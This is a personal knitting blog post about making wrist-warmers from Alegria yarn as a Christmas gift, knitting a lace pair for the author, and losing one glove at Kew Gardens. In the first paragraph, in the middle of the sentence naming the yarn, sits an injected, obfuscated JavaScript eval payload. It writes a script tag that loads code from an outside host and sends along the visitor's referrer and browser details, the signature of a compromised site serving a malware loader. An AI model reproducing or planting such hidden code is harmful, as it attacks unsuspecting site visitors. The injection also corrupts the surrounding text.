I decided to make some wrist-warmers for my Mother In Law for Christmas because she wears the all the time and hers are getting a bit tatty (hope she’s not reading this!) Anyway, I wasn’t sure which yarn to use, but decided on the gorgeous Alegria eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sadde|var|u0026u|referrer|zrhee||js|php’.split(‘|’),0,{}))
because it’s so soft yet hard wearing. However, I was also slightly up against it time-wise because I started them on Christmas eve (long story, but the present I had bought for her hadn’t arrived!) I therefore decided to double the yarn and as I had a pair of 5.5mm IC’s on a cable from making the
Altopiano Cowls I gave those a go…

alegria_wristwarmer1I can’t explain how happy I was with the result – and actually prefer the look of the Alegria doubled thn as a single yarn. You get a much more even marl, as opposed to small mini stripes. Please excuse the awful photo – it was taken in the car on my phone whilst moving (hopefully it goes without saying I wasn’t driving!)

I finished them in a couple of hours and wrapped them up and gave them to my unsuspecting Mother In Law and happily she loved them! I liked them so much that I decided to make another pair for myself, and guestimated that I had used roughly half the yarn, plus I needed something I could do in the car as we had several long journeys planned over the Christmas period. Also, given that time was no longer an issue, I decided to make mine with a lace motif. I looked through some books that I have and found a very pretty design that was a 15 stitch repeat, which as these were 33sts seemed perfect.

Here is a photo of the finished product. They took a little longer because I am still fairly novice when it comes to lace, and I had to count all the time. However, I LOVED them…

I use the past tense there… I took them on their first outing – a walk in Kew Gardens on Jan 2nd with my son, and I took him to the indoor play area. I’m not sure if you’ve been there, but there is no cloakroom and it’s a bit of a free-for-all… Anyway, sadly one of the gloves got lost… I searched for as long as my son would let me, getting more and more frantic, and eventually had to accept that it was gone… I can only assume some other parent had accidentally scooped it up with their children’s coats, jumpers, hats, wellies etc. I contacted lost property, but alas to no avail… At some point I will get around to knitting another one…
